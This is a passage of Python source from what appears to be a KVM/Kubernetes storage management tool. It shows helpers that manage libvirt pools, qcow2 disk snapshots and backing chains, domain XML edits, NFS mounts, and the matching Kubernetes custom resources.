pid = int(pf.read().strip())
pf.close()
except IOError:
pid = None
except SystemExit:
pid = None
return pid
def del_pid(self):
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
def start(self, *args, **kwargs):
if self.verbose >= 1:
            print('ready to start ...')
# check for a pid file to see if the daemon already runs
pid = self.get_pid()
if pid:
msg = 'pid file %s already exists, is it already running?\n'
sys.stderr.write(msg % self.pidfile)
sys.exit(1)
# start the daemon
self.daemonize()
self.run(*args, **kwargs)
def stop(self):
if self.verbose >= 1:
print('stopping ...')
pid = self.get_pid()
if not pid:
msg = 'pid file [%s] does not exist. Not running?\n' % self.pidfile
sys.stderr.write(msg)
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
return
# try to kill the daemon process
try:
i = 0
while 1:
os.kill(pid, signal.SIGTERM)
time.sleep(0.1)
i = i + 1
if i % 10 == 0:
os.kill(pid, signal.SIGHUP)
except OSError as err:
err = str(err)
if err.find('No such process') > 0:
if os.path.exists(self.pidfile):
os.remove(self.pidfile)
else:
print(str(err))
sys.exit(1)
if self.verbose >= 1:
print('Stopped!')
def restart(self, *args, **kwargs):
self.stop()
self.start(*args, **kwargs)
def is_running(self):
pid = self.get_pid()
# print(pid)
return pid and os.path.exists('/proc/%d' % pid)
def run(self, *args, **kwargs):
'NOTE: override the method in subclass'
print('base class run()')
def singleton(pid_filename):
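    # Decorator that takes an exclusive flock on pid_filename so that only one
    # instance of the wrapped function can run at a time.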
def decorator(f):
@wraps(f)
def decorated(*args, **kwargs):
pid = str(os.getpid())
pidfile = open(pid_filename, 'a+')
try:
fcntl.flock(pidfile.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
return
pidfile.seek(0)
pidfile.truncate()
pidfile.write(pid)
pidfile.flush()
pidfile.seek(0)
ret = f(*args, **kwargs)
try:
pidfile.close()
except IOError as err:
if err.errno != 9:
return
os.remove(pid_filename)
return ret
return decorated
return decorator
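# A minimal usage sketch for the singleton decorator (the pid file path below is hypothetical):
#
#   @singleton('/var/run/kubesds-example.pid')
#   def periodic_job():
#       ...  # overlapping invocations simply return without running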
def get_IP():
myname = socket.getfqdn(socket.gethostname())
myaddr = socket.gethostbyname(myname)
return myaddr
def get_pool_info(pool_):
if not pool_:
raise ExecuteException('', 'missing parameter: no pool name.')
result = runCmdAndSplitKvToJson('virsh pool-info %s' % pool_)
# result['allocation'] = int(1024*1024*1024*float(result['allocation']))
# result['available'] = int(1024 * 1024 * 1024 * float(result['available']))
# result['code'] = 0
# result['capacity'] = int(1024 * 1024 * 1024 * float(result['capacity']))
if 'allocation' in result.keys():
del result['allocation']
if 'available' in result.keys():
del result['available']
xml_dict = runCmdAndTransferXmlToJson('virsh pool-dumpxml %s' % pool_)
result['capacity'] = int(xml_dict['pool']['capacity']['text'])
result['available'] = int(xml_dict['pool']['capacity']['text'])
result['path'] = xml_dict['pool']['target']['path']
return result
def modify_disk_info_in_k8s(poolname, vol):
helper = K8sHelper("VirtualMachineDisk")
helper.update(vol, "volume", get_disk_info_to_k8s(poolname, vol))
def modify_snapshot_info_in_k8s(poolname, vol, name):
helper = K8sHelper("VirtualMachineDiskSnapshot")
helper.update(name, "volume", get_snapshot_info_to_k8s(poolname, vol, name))
def get_pool_info_from_k8s(pool):
if not pool:
raise ExecuteException('', 'missing parameter: no pool name.')
poolHelper = K8sHelper('VirtualMachinePool')
pool_info = poolHelper.get_data(pool, 'pool')
if pool_info == None:
raise ExecuteException('', 'can not get pool info %s from k8s' % pool)
return pool_info
def get_image_info_from_k8s(image):
if not image:
raise ExecuteException('', 'missing parameter: no image name.')
image_helper = K8sHelper('VirtualMachineDiskImage')
return image_helper.get_data(image, 'volume')
def get_vol_info_from_k8s(vol):
if not vol:
raise ExecuteException('', 'missing parameter: no disk name.')
helper = K8sHelper('VirtualMachineDisk')
vol_info = helper.get_data(vol, 'volume')
if vol_info == None:
raise ExecuteException('', 'can not get disk info %s from k8s' % vol)
return vol_info
def try_get_diskmn_by_path(disk_path):
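    # Derive the disk (vmd) name from a volume or snapshot file path: snapshot paths
    # use the grandparent directory name, otherwise try the basename in k8s and fall
    # back to the parent directory name.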
if disk_path.find('snapshots') >= 0:
disk_mn = os.path.basename(os.path.dirname(os.path.dirname(disk_path)))
else:
try:
vol_info = get_vol_info_from_k8s(os.path.basename(disk_path))
disk_mn = os.path.basename(disk_path)
except:
disk_mn = os.path.basename(os.path.dirname(disk_path))
vol_info = get_vol_info_from_k8s(disk_mn)
return disk_mn
def get_snapshot_info_from_k8s(snapshot):
if not snapshot:
raise ExecuteException('', 'missing parameter: no disk name.')
helper = K8sHelper('VirtualMachineDiskSnapshot')
ss_info = helper.get_data(snapshot, 'volume')
if ss_info == None:
raise ExecuteException('', 'can not get snapshot info %s from k8s' % snapshot)
return ss_info
def get_disk_config(pool, vol):
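    # Load <pool path>/<vol>/config.json, which records the disk's current image
    # file and its owning pool.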
if not pool or not vol:
raise ExecuteException('', 'missing parameter: no pool or disk name.')
poolInfo = get_pool_info(pool)
pool_path = poolInfo['path']
if not os.path.isdir(pool_path):
raise ExecuteException('', "can not get pool %s path." % pool)
config_path = '%s/%s/config.json' % (pool_path, vol)
with open(config_path, "r") as f:
config = load(f)
return config
def get_disk_config_by_path(config_path):
if not config_path:
raise ExecuteException('', 'cannot find "config.json" in disk dir.')
with open(config_path, "r") as f:
config = load(f)
return config
def get_disk_snapshots(ss_path):
ss_chain = get_sn_chain(ss_path)
snapshots = []
for disk_info in ss_chain:
if disk_info['filename'] != ss_path:
snapshots.append(disk_info['filename'])
return snapshots
def get_disk_info(ss_path):
try:
result = runCmdWithResult('qemu-img info -U --output json %s' % ss_path)
except:
try:
result = runCmdWithResult('qemu-img info --output json %s' % ss_path)
except:
logger.debug(traceback.format_exc())
error_print(400, "can't get snapshot info in qemu-img.")
exit(1)
json_str = dumps(result)
return loads(json_str.replace('-', '_'))
def change_vol_current(vol, current):
vol_info = get_vol_info_from_k8s(vol)
pool_info = get_pool_info_from_k8s(vol_info['pool'])
check_pool_active(pool_info)
config_path = '%s/%s/config.json' % (pool_info['path'], vol)
config = {}
if os.path.exists(config_path):
with open(config_path, 'r') as f:
config = load(f)
config['current'] = current
else:
config['name'] = vol
config['pool'] = vol_info['pool']
config['poolname'] = vol_info['poolname']
config['dir'] = '%s/%s' % (pool_info['path'], vol)
config['current'] = current
with open(config_path, 'w') as f:
dump(config, f)
helper = K8sHelper("VirtualMachineDisk")
helper.update(vol, 'volume', get_disk_info_to_k8s(pool_info['poolname'], vol))
def get_pool_info_to_k8s(type, pool, url, poolname, content):
result = get_pool_info(poolname)
result['content'] = content
result["pooltype"] = type
result["pool"] = pool
result["free"] = result['available']
result["poolname"] = poolname
result["uuid"] = poolname
result["url"] = url
if is_pool_started(poolname):
result["state"] = "active"
else:
result["state"] = "inactive"
return result
def write_config(vol, dir, current, pool, poolname):
config = {}
config['name'] = vol
config['dir'] = dir
config['current'] = current
config['pool'] = pool
config['poolname'] = poolname
with open('%s/config.json' % dir, "w") as f:
logger.debug(config)
dump(config, f)
def get_disk_info_to_k8s(poolname, vol):
config_path = '%s/%s/config.json' % (get_pool_info(poolname)['path'], vol)
if not os.path.exists(config_path):
return get_vol_info_from_k8s(vol)
with open(config_path, "r") as f:
config = load(f)
result = get_disk_info(config['current'])
result['disk'] = vol
result["pool"] = config['pool']
result["poolname"] = poolname
result["uni"] = config['current']
result["current"] = config['current']
return result
def get_remote_node_all_nic_ip(remote):
ips = []
try:
output = remoteRunCmdWithOutput(remote, 'ip address | grep inet')
for line in output.splitlines():
if len(line.split()) > 1:
ip = line.split()[1].split('/')[0]
ips.append(ip)
except:
logger.debug(traceback.format_exc())
return ips
def get_snapshot_info_to_k8s(poolname, vol, name):
config_path = '%s/%s/config.json' % (get_pool_info(poolname)['path'], vol)
if not os.path.exists(config_path):
return get_snapshot_info_from_k8s(name)
with open(config_path, "r") as f:
config = load(f)
ss_path = '%s/snapshots/%s' % (config['dir'], name)
result = get_disk_info(ss_path)
result['disk'] = vol
result["pool"] = config['pool']
result["poolname"] = poolname
result["uni"] = config['current']
result['snapshot'] = name
return result
def get_sn_chain(ss_path):
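    # Return the qemu-img backing chain of ss_path as a list of image-info dicts.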
try:
result = runCmdWithResult('qemu-img info -U --backing-chain --output json %s' % ss_path)
except:
try:
result = runCmdWithResult('qemu-img info --backing-chain --output json %s' % ss_path)
except:
logger.debug(traceback.format_exc())
error_print(400, "can't get snapshot info in qemu-img.")
exit(1)
return result
def get_sn_chain_path(ss_path):
paths = set()
chain = get_sn_chain(ss_path)
for info in chain:
if 'backing-filename' in list(info.keys()):
paths.add(info['backing-filename'])
return list(paths)
def get_all_snapshot_to_delete(ss_path, current):
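    # Collect the snapshot images that sit on top of ss_path in the backing chain
    # leading to `current`; they have to be removed together with ss_path.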
delete_sn = []
chain = get_sn_chain(current)
for info in chain:
if 'backing-filename' in list(info.keys()) and info['backing-filename'] == ss_path:
delete_sn.append(info['filename'])
delete_sn.extend(get_all_snapshot_to_delete(info['filename'], current))
break
return delete_sn
class DiskImageHelper(object):
@staticmethod
def get_backing_file(file, raise_it=False):
""" Gets backing file for disk image """
get_backing_file_cmd = "qemu-img info %s" % file
try:
out = runCmdRaiseException(get_backing_file_cmd, use_read=True)
except Exception as e:
if raise_it:
raise e
get_backing_file_cmd = "qemu-img info -U %s" % file
out = runCmdRaiseException(get_backing_file_cmd, use_read=True)
lines = out.decode('utf-8').split('\n')
for line in lines:
if re.search("backing file:", line):
return str(line.strip().split()[2])
return None
@staticmethod
def get_backing_files_tree(file):
""" Gets all backing files (snapshot tree) for disk image """
backing_files = []
backing_file = DiskImageHelper.get_backing_file(file)
while backing_file is not None:
backing_files.append(backing_file)
backing_file = DiskImageHelper.get_backing_file(backing_file)
return backing_files
@staticmethod
def set_backing_file(backing_file, file):
""" Sets backing file for disk image """
set_backing_file_cmd = "qemu-img rebase -u -b %s %s" % (backing_file, file)
runCmdRaiseException(set_backing_file_cmd)
def check_disk_in_use(disk_path):
try:
result = runCmdWithResult('qemu-img info --output json %s' % disk_path)
except:
return True
return False
def delete_vm_disk_in_xml(xmlfile, disk_file):
tree = ET.parse(xmlfile)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element.get("file") == disk_file:
caption.remove(disk)
tree.write(xmlfile)
return True
return False
def delete_vm_cdrom_file_in_xml(xmlfile):
tree = ET.parse(xmlfile)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'cdrom' == disk.attrib['device']:
source_element = disk.find("source")
if source_element is not None:
disk.remove(source_element)
tree.write(xmlfile)
return True
return False
def modofy_vm_disk_file(xmlfile, source, target):
tree = ET.parse(xmlfile)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element.get("file") == source:
source_element.set("file", target)
tree.write(xmlfile)
return True
return False
def attach_vm_disk(vm, disk):
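    # Attach the disk to the vm on the first free 'vdX' target, using --live when
    # the domain is running; the whole operation is retried a few times.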
time = 4
for t in range(time):
try:
disk_specs = get_disks_spec(vm)
if not os.path.exists(disk):
raise ExecuteException('', 'disk file %s not exist.' % disk)
if disk in list(disk_specs.keys()):
raise ExecuteException('', 'disk file %s has attached in vm %s.' % (disk, vm))
tag = None
letter_list = list(string.ascii_lowercase)
for i in letter_list:
if ('vd' + i) not in list(disk_specs.values()):
tag = 'vd' + i
break
disk_info = get_disk_info(disk)
if is_vm_active(vm):
runCmd('virsh attach-disk --domain %s --cache none --live --config %s --target %s --subdriver %s' % (
vm, disk, tag, disk_info['format']))
else:
runCmd('virsh attach-disk --domain %s --cache none --config %s --target %s --subdriver %s' % (
vm, disk, tag, disk_info['format']))
return
except Exception:
logger.debug(traceback.format_exc())
pass
raise ExecuteException('RunCmdError', 'can not attach disk %s to vm %s' % (disk, vm))
def modofy_vm_disks(vm, source_to_target):
if not vm or not source_to_target:
raise ExecuteException('', 'missing parameter: no vm name(%s) or source_to_target.' % vm)
runCmd('virsh dumpxml %s > /tmp/%s.xml' % (vm, vm))
tree = ET.parse('/tmp/%s.xml' % vm)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element.get("file") in list(source_to_target.keys()):
source_element.set("file", source_to_target[source_element.get("file")])
tree.write('/tmp/%s.xml' % vm)
runCmd('virsh define /tmp/%s.xml' % vm)
runCmd('rm /tmp/%s.xml' % vm)
return True
return False
def define_and_restore_vm_disks(xmlfile, newname, source_to_target):
logger.debug(xmlfile)
logger.debug(source_to_target)
if not xmlfile or not source_to_target:
raise ExecuteException('', 'missing parameter: no vm xml file %s or source_to_target.' % xmlfile)
uuid = randomUUID().replace('-', '')
vm_file = '/tmp/%s.xml' % uuid
runCmd('cp %s %s' % (xmlfile, vm_file))
tree = ET.parse(vm_file)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
nameList = root.findall("name")
for name in nameList:
name.text = newname
uuidList = root.findall("uuid")
for uuid in uuidList:
uuid.text = randomUUID()
captionList = root.findall("devices")
for caption in captionList:
interfaces = caption.findall("interface")
for interface in interfaces:
caption.remove(interface)
disks = caption.findall("disk")
disk_need_to_delete = []
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element.get("file") in list(source_to_target.keys()):
source_element.set("file", source_to_target[source_element.get("file")])
else:
disk_need_to_delete.append(disk)
for disk in disk_need_to_delete:
caption.remove(disk)
tree.write(vm_file)
runCmd('virsh define %s' % vm_file)
runCmd('rm %s' % vm_file)
try:
helper = K8sHelper('VirtualMachine')
vm_xml = get_vm_xml(newname)
vm_json = toKubeJson(xmlToJson(vm_xml))
vm_json = updateDomain(loads(vm_json))
helper.create(newname, 'domain', vm_json)
except:
pass
def try_fix_disk_metadata(path):
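    # Best-effort repair: if a domain uses an image of this disk that differs from
    # the recorded 'current' file, rewrite config.json and refresh the k8s objects;
    # returns the corrected path or None.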
if os.path.basename(os.path.dirname(path)) == 'snapshots':
disk = os.path.basename(os.path.dirname(os.path.dirname(path)))
disk_dir = os.path.dirname(os.path.dirname(path))
else:
disk = os.path.basename(os.path.dirname(path))
disk_dir = os.path.dirname(path)
vol_info = get_vol_info_from_k8s(disk)
pool_info = get_pool_info_from_k8s(vol_info['pool'])
try:
config_file = '%s/config.json' % disk_dir
logger.debug("config_file: %s" % config_file)
if not os.path.exists(config_file):
RETRY_TIMES = 4
for i in range(RETRY_TIMES):
try:
pool_active(pool_info['pool'])
break
except ExecuteException as e:
if i < RETRY_TIMES - 1:
pass
else:
error_print(101, "pool %s can not be active" % pool_info['pool'])
config = get_disk_config_by_path(config_file)
domains = get_all_domain()
for domain in domains:
try:
disk_specs = get_disks_spec(domain)
for disk_path in list(disk_specs.keys()):
if os.path.basename(os.path.dirname(disk_path)) == disk or os.path.basename(
os.path.dirname(os.path.dirname(disk_path))) == disk:
if config['current'] != disk_path or vol_info['current'] != disk_path:
logger.debug('try_fix_disk_metadata')
logger.debug('domain %s current: %s' % (domain, disk_path))
write_config(disk, disk_dir, disk_path, config['pool'], config['poolname'])
modifyDiskAndSs(config['pool'], disk)
return disk_path
except:
pass
# not attach to vm, just try to fix disk
# lists = []
# for df in os.listdir(disk_dir):
# if df == 'config.json':
# continue
# lists.append('%s/%s' % (disk_dir, df))
# ss_dir = '%s/snapshots' % disk_dir
# if os.path.exists(ss_dir):
# for df in os.listdir(ss_dir):
# if df == 'config.json':
# continue
# lists.append('%s/%s' % (ss_dir, df))
# lists.sort(key=lambda x: os.path.getmtime(x))
# file_new = lists[-1]
# disk_info = get_disk_info(file_new)
# if config['current'] != file_new or vol_info['current'] != file_new:
# logger.debug('try_fix_disk_metadata')
# logger.debug('current: %s' % file_new)
# write_config(disk, disk_dir, file_new, config['pool'], config['poolname'])
# modify_disk_info_in_k8s(config['poolname'], disk)
# return file_new
except:
logger.debug(traceback.format_exc())
return None
def change_vm_os_disk_file(vm, source, target):
if not vm or not source or not target:
raise ExecuteException('', 'missing parameter: no vm name(%s) or source path(%s) or target path(%s).' % (
vm, source, target))
runCmd('virsh dumpxml %s > /tmp/%s.xml' % (vm, vm))
tree = ET.parse('/tmp/%s.xml' % vm)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
if source_element.get("file") == source:
source_element.set("file", target)
tree.write('/tmp/%s.xml' % vm)
runCmd('virsh define /tmp/%s.xml' % vm)
return True
return False
def is_shared_storage(path):
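    # A path counts as shared storage when 'df' reports its filesystem source in the
    # form <IPv4 address>:<export>, i.e. an NFS-style remote mount.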
if not path:
raise ExecuteException('', 'missing parameter: no path.')
cmd = 'df %s | awk \'{print $1}\' | sed -n "2, 1p"' % path
fs = runCmdAndGetOutput(cmd)
if fs:
fs = fs.strip()
        if re.match(r'^((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}:.*$', fs):
return True
return False
def get_vm_disks_from_xml(xmlfile):
tree = ET.parse(xmlfile)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
all_disks = []
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
disk_file = source_element.get("file")
if not is_shared_storage(disk_file):
all_disks.append(disk_file)
return all_disks
def is_vm_disk_not_shared_storage(vm):
if not vm:
raise ExecuteException('', 'missing parameter: no vm name.')
runCmd('virsh dumpxml %s > /tmp/%s.xml' % (vm, vm))
tree = ET.parse('/tmp/%s.xml' % vm)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("source")
disk_file = source_element.get("file")
if not is_shared_storage(disk_file):
return False
return True
def is_vm_disk_driver_cache_none(vm):
if not vm:
raise ExecuteException('', 'missing parameter: no vm name.')
runCmd('virsh dumpxml %s > /tmp/%s.xml' % (vm, vm))
tree = ET.parse('/tmp/%s.xml' % vm)
root = tree.getroot()
# for child in root:
# print(child.tag, "----", child.attrib)
captionList = root.findall("devices")
for caption in captionList:
disks = caption.findall("disk")
for disk in disks:
if 'disk' == disk.attrib['device']:
source_element = disk.find("driver")
if "cache" in list(source_element.keys()) and source_element.get("cache") == "none":
continue
else:
return False
return True
def remote_start_pool(ip, pool):
pool_info = get_pool_info_from_k8s(pool)
remoteRunCmd(ip, 'kubesds-adm startPool --type %s --pool %s' % (pool_info['pooltype'], pool))
def auto_mount(pool):
pool_info = get_pool_info_from_k8s(pool)
proto = pool_info['pooltype']
# opt = pool_info['url']
opt = ''
MOUNT_PATH = os.path.dirname(pool_info['path'])
if not os.path.exists(MOUNT_PATH):
os.makedirs(MOUNT_PATH)
if pool_info['pooltype'] == 'nfs' and 'url' in pool_info.keys():
url = pool_info['url']
output = runCmdAndGetOutput('df %s' % MOUNT_PATH)
for line in output.splitlines():
if line.find(url) >= 0:
return
runCmd(
'timeout --preserve-status --foreground 5 mount -t %s -o %s %s %s >/dev/null' % (
proto, opt, url, MOUNT_PATH))
def mount_storage(pooltype, opt, url, path):
if pooltype == 'nfs':
runCmd(
'timeout --preserve-status --foreground 5 mount -t %s -o %s %s %s >/dev/null' % (pooltype, opt, url, path))
def umount_storage(pool):
pool_info = get_pool_info_from_k8s(pool)
proto = pool_info['pooltype']
path = pool_info['path']
MOUNT_PATH = os.path.dirname(pool_info['path'])
if proto == 'nfs' and 'url' in pool_info.keys():
url = pool_info['url']
output = runCmdAndGetOutput('df %s' % MOUNT_PATH)
for line in output.splitlines():
if line.find(url) >= 0:
runCmd('timeout --preserve-status --foreground 5 umount -f %s >/dev/null' % MOUNT_PATH)
def pool_active(pool):
auto_mount(pool)
def get_pool_all_disk(poolname):
output = None
for i in range(30):
try:
output = rpcCallAndGetOutput(
'kubectl get vmd -o=jsonpath="{range .items[?(@.spec.volume.poolname==\\"%s\\")]}{.metadata.name}{\\"\\t\\"}{.metadata.labels.host}{\\"\\n\\"}{end}"' % poolname)
break
except Exception:
logger.debug(traceback.format_exc())
disks = []
if output:
for line in output.splitlines():
disk = {}
if len(line.split()) < 2:
continue
disk['disk'] = line.split()[0]
disk['host'] = line.split()[1]
disks.append(disk)
return disks
def get_pool_all_ss(poolname):
output = None
for i in range(30):
try:
output = rpcCallAndGetOutput(
'kubectl get vmdsn -o=jsonpath="{range .items[?(@.spec.volume.poolname==\\"%s\\")]}{.metadata.name}{\\"\\t\\"}{.metadata.labels.host}{\\"\\n\\"}{end}"' % poolname)
break
except Exception:
logger.debug(traceback.format_exc())
disks = []
if output:
for line in output.splitlines():
disk = {}
if len(line.split()) < 2:
continue
disk['ss'] = line.split()[0]
disk['host'] = line.split()[1]
disks.append(disk)
return disks
def get_pools_by_node(node_name):
output = None
for i in range(30):
try:
output = rpcCallAndGetOutput(
'kubectl get vmp -o=jsonpath="{range .items[?(.metadata.labels.host==\\"%s\\")]}{.metadata.name}{\\"\\t\\"}{.spec.pool.poolname}{\\"\\t\\"}{.metadata.labels.host}{\\"\\n\\"}{end}"' % node_name)
break
except Exception:
logger.debug(traceback.format_exc())
pools = []
if output:
for line in output.splitlines():
pool = {}
if len(line.split()) < 3:
continue
pool['pool'] = line.split()[0]
pool['poolname'] = line.split()[1]
pools.append(pool)
return pools
def get_pools_by_path(path):
output = None
for i in range(30):
try:
output = rpcCallAndGetOutput(
'kubectl get vmp -o=jsonpath="{range .items[?(@.spec.pool.path==\\"%s\\")]}{.metadata.name}{\\"\\t\\"}{.metadata.labels.host}{\\"\\t\\"}{.spec.pool.path}{\\"\\n\\"}{end}"' % path)
break
except Exception:
logger.debug(traceback.format_exc())
pools = []
if output:
for line in output.splitlines():
pool = {}
if len(line.split()) < 3:
continue
pool['pool'] = line.split()[0]
pool['host'] = line.split()[1]
pools.append(pool)
return pools
def get_pools_by_poolname(poolname):
output = None
for i in range(30):
try:
output = rpcCallAndGetOutput(
'kubectl get vmp -o=jsonpath="{range .items[?(@.spec.pool.poolname==\\"%s\\")]}{.metadata.name}{\\"\\t\\"}{.metadata.labels.host}{\\"\\t\\"}{.spec.pool.path}{\\"\\n\\"}{end}"' % poolname)
break
except Exception:
logger.debug(traceback.format_exc())
pools = []
if output:
for line in output.splitlines():
pool = {}
if len(line.split()) < 3:
continue
pool['pool'] = line.split()[0]
pool['host'] = line.split()[1]
pools.append(pool)
return pools
def get_all_node_ip():
all_node_ip = []
try:
jsondict = client.CoreV1Api().list_node().to_dict()
nodes = jsondict['items']
for node in nodes:
try:
node_ip = {}
node_ip['ip'] = node['metadata']['annotations']['THISIP']
node_ip['nodeName'] = node['metadata']['name']
all_node_ip.append(node_ip)
except:
logger.debug(traceback.format_exc())
except ApiException as e:
logger.debug("Exception when calling CoreV1Api->list_node: %s\n" % e)
except Exception as e:
logger.debug("Exception when calling get_all_node_ip: %s\n" % e)
return all_node_ip
def get_spec(jsondict):
spec = jsondict.get('spec')
if not spec:
raw_object = jsondict.get('raw_object')
if raw_object:
spec = raw_object.get('spec')
return spec
# get disk and snapshot jsondict and change to targetPool
# def get_migrate_disk_jsondict(disk, targetPool):
# jsondicts = []
# # two case: 1. pool has same path 2. pool has different path
# pool_helper = K8sHelper('VirtualMachinePool')
# pool_metadata = pool_helper.get(targetPool)['metadata']
# pool_info = pool_helper.get_data(targetPool, 'pool')
#
# # get disk jsondict
# disk_helper = K8sHelper('VirtualMachineDisk')
# disk_info = disk_helper.get_data(disk, 'volume')
# disk_jsondict = disk_helper.get(disk)
# if disk_info['poolname'] == pool_info['poolname']: # same poolname
# if disk_jsondict:
# disk_jsondict['metadata']['labels']['host'] = pool_metadata['labels']['host']
# spec = get_spec(disk_jsondict)
# if spec:
# nodeName = spec.get('nodeName')
# if nodeName:
# spec['nodeName'] = pool_metadata['labels']['host']
# disk_info['pool'] = targetPool
# disk_info["poolname"] = pool_info['poolname']
# spec['volume'] = disk_info
# jsondicts.append(disk_jsondict)
# ss_helper = K8sHelper('VirtualMachineDiskSnapshot')
# ss_dir = '%s/%s/snapshots' % (pool_info['path'], disk)
# for ss in os.listdir(ss_dir):
# try:
# ss_jsondict = ss_helper.get(ss)
# if ss_jsondict:
# ss_jsondict['metadata']['labels']['host'] = pool_metadata['labels']['host']
# spec = get_spec(ss_jsondict)
# if spec:
# nodeName = spec.get('nodeName')
# if nodeName:
# spec['nodeName'] = pool_metadata['labels']['host']
# disk_info['pool'] = targetPool
# disk_info["poolname"] = pool_info['poolname']
# spec['volume'] = disk_info
# jsondicts.append(ss_jsondict)
# except ExecuteException:
# pass
#
# else: #different poolname
# pass
#
#
# return jsondicts
def get_disk_jsondict(pool, disk):
jsondicts = []
pool_helper = K8sHelper('VirtualMachinePool')
pool_jsondict = pool_helper.get(pool)
pool_node_name = pool_jsondict['metadata']['labels']['host']
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
# get disk jsondict
disk_helper = K8sHelper('VirtualMachineDisk')
# if pool_info['pooltype'] not in ['localfs', 'nfs', 'glusterfs', "vdiskfs"]:
# raise ExecuteException("RunCmdError", "not support pool type %s" % pool_info['pooltype'])
if disk_helper.exist(disk): # migrate disk or migrate vm
disk_jsondict = disk_helper.get(disk)
# update disk jsondict
disk_jsondict['metadata']['labels']['host'] = pool_node_name
spec = get_spec(disk_jsondict)
logger.debug(disk_jsondict)
if spec:
nodeName = spec.get('nodeName')
if nodeName:
spec['nodeName'] = pool_node_name
# disk_dir = '%s/%s' % (pool_info['path'], disk)
# config = get_disk_config(pool, disk)
# write_config(disk, disk_dir, config['current'], pool, config['poolname'])
disk_info = get_disk_info_to_k8s(pool_info['poolname'], disk)
spec['volume'] = disk_info
logger.debug(disk_jsondict)
jsondicts.append(disk_jsondict)
# update snapshot jsondict
ss_helper = K8sHelper('VirtualMachineDiskSnapshot')
ss_dir = '%s/%s/snapshots' % (pool_info['path'], disk)
if os.path.exists(ss_dir):
for ss in os.listdir(ss_dir):
try:
ss_jsondict = ss_helper.get(ss)
if ss_jsondict and ss_helper.get_data(ss, 'volume')['disk'] == disk:
ss_jsondict['metadata']['labels']['host'] = pool_node_name
spec = get_spec(ss_jsondict)
if spec:
nodeName = spec.get('nodeName')
if nodeName:
spec['nodeName'] = pool_node_name
ss_info = get_snapshot_info_to_k8s(pool_info['poolname'], disk, ss)
spec['volume'] = ss_info
jsondicts.append(ss_jsondict)
except ExecuteException:
pass
else: # clone disk
disk_info = get_disk_info_to_k8s(pool_info['poolname'], disk)
disk_jsondict = disk_helper.get_create_jsondict(disk, 'volume', disk_info)
jsondicts.append(disk_jsondict)
# ss_helper = K8sHelper('VirtualMachineDiskSnapshot')
# ss_dir = '%s/%s/snapshots' % (pool_info['path'], disk)
# for ss in os.listdir(ss_dir):
# try:
# ss_info = get_snapshot_info_to_k8s(pool_info['poolname'], disk, ss)
# ss_jsondict = ss_helper.get_create_jsondict(ss)
#
# jsondicts.append(ss_jsondict)
# except ExecuteException:
# pass
return jsondicts
def modifyDiskAndSs(pool, disk):
# get disk node label in ip
node_name = get_hostname_in_lower_case()
# node_name = get_node_name_by_node_ip(params.ip)
logger.debug("node_name: %s" % node_name)
pool_info = get_pool_info_from_k8s(pool)
pools = get_pools_by_path(pool_info['path'])
logger.debug("pools: %s" % dumps(pools))
logger.debug("node_name: %s" % node_name)
# change disk node label in k8s.
targetPool = None
for pool in pools:
if pool['host'] == node_name:
targetPool = pool['pool']
if targetPool:
all_jsondicts = get_disk_jsondict(targetPool, disk)
apply_all_jsondict(all_jsondicts)
def rebase_snapshot_with_config(pool, vol):
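    # After a disk has been moved to another pool, rewrite its config.json so that
    # 'current' points into the new pool path, rebase every image whose backing file
    # moved, then re-apply the disk and snapshot objects in k8s.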
pool_info = get_pool_info_from_k8s(pool)
check_pool_active(pool_info)
old_disk_info = get_vol_info_from_k8s(vol)
old_pool_info = get_pool_info_from_k8s(old_disk_info['pool'])
check_pool_active(old_pool_info)
old_disk_dir = '%s/%s' % (old_pool_info['path'], vol)
disk_dir = '%s/%s' % (pool_info['path'], vol)
# change config
old_config = get_disk_config(pool_info['poolname'], vol)
current = old_config['current'].replace(old_pool_info['path'], pool_info['path'])
write_config(vol, disk_dir, current, pool, pool_info['poolname'])
# change backing file
logger.debug('disk_dir: %s' % disk_dir)
for ss in os.listdir(disk_dir):
if ss == 'snapshots' or ss == 'config.json':
continue
ss_info = None
ss_full_path = '%s/%s' % (disk_dir, ss)
try:
ss_info = get_disk_info(ss_full_path)
except ExecuteException:
pass
if ss_info:
if 'backing_filename' in list(ss_info.keys()):
old_backing_file = ss_info['backing_filename']
new_backing_file = old_backing_file.replace(old_disk_dir, disk_dir)
logger.debug('old backing file %s, new backing file %s' % (old_backing_file, new_backing_file))
if os.path.exists(new_backing_file):
runCmd('qemu-img rebase -b %s %s' % (new_backing_file, ss_full_path))
ss_dir = '%s/snapshots' % disk_dir
logger.debug('ss_dir: %s' % ss_dir)
if os.path.exists(ss_dir):
for ss in os.listdir(ss_dir):
ss_info = None
ss_full_path = '%s/%s' % (ss_dir, ss)
try:
